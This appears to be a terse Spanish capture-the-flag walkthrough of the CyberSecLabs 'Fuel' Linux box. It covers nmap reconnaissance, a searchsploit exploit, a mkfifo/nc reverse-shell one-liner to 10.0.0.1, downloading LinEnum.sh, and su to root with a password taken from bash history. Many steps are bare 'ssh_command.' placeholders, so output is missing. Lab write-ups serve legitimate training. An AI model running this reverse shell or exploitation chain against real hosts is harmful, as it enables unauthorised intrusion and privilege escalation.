Cu3rv0x
Fuel

Fuel


CyberSecLabs Linux

nmap -A -p- -oA output 172.31.1.28 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -p- -sS —min-rate=5000 —open -vvv -n -Pn 172.31.1.28 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sC -sV -p1880 172.31.1.28 -oN targeted

ssh_command.

nmap —script http-enum -p1880 172.31.1.28 -oN webScan

ssh_command.

whatweb 172.31.1.28:80

ssh_command.

cat targeted

ssh_command.

ssh_command.

ssh_command.

ssh_command.

seachsploit Fuel

searchsploit -m 47318.py

Modificamos el archivo

ssh_command.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

ssh_command.

which python3

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

sudo -l

No tenemos las credenciales para moira

ssh_command.

python3 -m http.server 88888

wget http://10.10.0.12:8888/LinEnum.sh

chmod +x LinEnum.sh

ssh_command.

su root

Ponemos la contrasena que se encontro en la historia de bash

ssh_command.

© 2025 Cu3rv0x